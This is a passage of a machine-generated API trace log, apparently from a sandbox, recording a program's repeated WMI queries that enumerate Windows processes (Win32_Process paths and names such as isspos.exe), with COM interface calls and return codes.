pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269b1b0*=8, plFlavor=0x269b1b4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x269b1b0*=8, plFlavor=0x269b1b4*=0) returned 0x0 [0214.798] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0214.798] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0214.798] CoTaskMemAlloc (cb=0x4) returned 0x5632328 [0214.798] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632328, puReturned=0x267acc0 | out: apObjects=0x5632328*=0x56362d8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.875] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x56362d8) returned 0x0 [0214.875] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.875] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.876] IUnknown:AddRef (This=0x56362d8) returned 0x3 [0214.876] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.876] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.876] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x56362dc) returned 0x0 [0214.876] IMarshal:GetUnmarshalClass (in: This=0x56362dc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.876] IUnknown:Release (This=0x56362dc) returned 0x3 [0214.876] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.876] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.876] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.876] IUnknown:Release (This=0x56362d8) returned 0x2 [0214.876] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.876] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.876] IUnknown:QueryInterface (in: This=0x56362d8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x56362d8) returned 0x0 [0214.876] IUnknown:AddRef (This=0x56362d8) returned 0x4 [0214.876] IUnknown:Release (This=0x56362d8) returned 0x3 [0214.876] IUnknown:Release (This=0x56362d8) returned 0x2 [0214.876] CoTaskMemFree (pv=0x5632328) [0214.876] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.876] IUnknown:AddRef (This=0x56362d8) returned 0x3 [0214.877] IWbemClassObject:Get (in: This=0x56362d8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.877] IWbemClassObject:Get (in: This=0x56362d8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2736\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.877] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2736\"") returned 0x66 [0214.877] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2736\"") returned 0x66 [0214.877] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.877] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.877] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.877] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.878] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632328) returned 0x0 [0214.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632328, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.879] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632328, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638280) returned 0x0 [0214.879] WbemDefPath:IUnknown:Release (This=0x5632328) returned 0x0 [0214.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638280) returned 0x0 [0214.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.879] WbemDefPath:IUnknown:AddRef (This=0x5638280) returned 0x3 [0214.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632338) returned 0x0 [0214.880] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632338, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.880] WbemDefPath:IUnknown:Release (This=0x5632338) returned 0x3 [0214.880] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.880] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.880] WbemDefPath:IUnknown:Release (This=0x5638280) returned 0x2 [0214.880] WbemDefPath:IUnknown:Release (This=0x5638280) returned 0x1 [0214.880] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.880] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638280, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638280) returned 0x0 [0214.880] WbemDefPath:IUnknown:AddRef (This=0x5638280) returned 0x3 [0214.880] WbemDefPath:IUnknown:Release (This=0x5638280) returned 0x2 [0214.880] WbemDefPath:IWbemPath:SetText (This=0x5638280, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2736\"") returned 0x0 [0214.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.880] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.880] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.881] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.881] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.881] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.881] IWbemClassObject:Get (in: This=0x56362d8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269ba34*=0, plFlavor=0x269ba38*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x269ba34*=8, plFlavor=0x269ba38*=0) returned 0x0 [0214.881] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0214.881] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0214.881] IWbemClassObject:Get (in: This=0x56362d8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269ba34*=8, plFlavor=0x269ba38*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x269ba34*=8, plFlavor=0x269ba38*=0) returned 0x0 [0214.881] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0214.881] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0214.881] CoTaskMemAlloc (cb=0x4) returned 0x5632368 [0214.881] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632368, puReturned=0x267acc0 | out: apObjects=0x5632368*=0x5636470, puReturned=0x267acc0*=0x1) returned 0x0 [0214.882] IUnknown:QueryInterface (in: This=0x5636470, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636470) returned 0x0 [0214.882] IUnknown:QueryInterface (in: This=0x5636470, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.882] IUnknown:QueryInterface (in: This=0x5636470, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.883] IUnknown:AddRef (This=0x5636470) returned 0x3 [0214.883] IUnknown:QueryInterface (in: This=0x5636470, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.883] IUnknown:QueryInterface (in: This=0x5636470, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.883] IUnknown:QueryInterface (in: This=0x5636470, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5636474) returned 0x0 [0214.883] IMarshal:GetUnmarshalClass (in: This=0x5636474, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.883] IUnknown:Release (This=0x5636474) returned 0x3 [0214.883] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.883] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.883] IUnknown:QueryInterface (in: This=0x5636470, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.883] IUnknown:Release (This=0x5636470) returned 0x2 [0214.883] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.883] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.883] IUnknown:QueryInterface (in: This=0x5636470, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636470) returned 0x0 [0214.883] IUnknown:AddRef (This=0x5636470) returned 0x4 [0214.883] IUnknown:Release (This=0x5636470) returned 0x3 [0214.883] IUnknown:Release (This=0x5636470) returned 0x2 [0214.883] CoTaskMemFree (pv=0x5632368) [0214.883] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.884] IUnknown:AddRef (This=0x5636470) returned 0x3 [0214.884] IWbemClassObject:Get (in: This=0x5636470, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.884] IWbemClassObject:Get (in: This=0x5636470, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2768\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.884] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2768\"") returned 0x66 [0214.884] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2768\"") returned 0x66 [0214.884] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.884] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.884] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.884] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.885] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632368) returned 0x0 [0214.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632368, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.885] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632368, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638360) returned 0x0 [0214.885] WbemDefPath:IUnknown:Release (This=0x5632368) returned 0x0 [0214.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638360) returned 0x0 [0214.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.886] WbemDefPath:IUnknown:AddRef (This=0x5638360) returned 0x3 [0214.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632378) returned 0x0 [0214.886] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632378, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.886] WbemDefPath:IUnknown:Release (This=0x5632378) returned 0x3 [0214.886] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.886] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.886] WbemDefPath:IUnknown:Release (This=0x5638360) returned 0x2 [0214.886] WbemDefPath:IUnknown:Release (This=0x5638360) returned 0x1 [0214.886] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.886] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638360, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638360) returned 0x0 [0214.886] WbemDefPath:IUnknown:AddRef (This=0x5638360) returned 0x3 [0214.886] WbemDefPath:IUnknown:Release (This=0x5638360) returned 0x2 [0214.886] WbemDefPath:IWbemPath:SetText (This=0x5638360, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2768\"") returned 0x0 [0214.886] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.886] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.886] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.886] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.886] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.886] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, 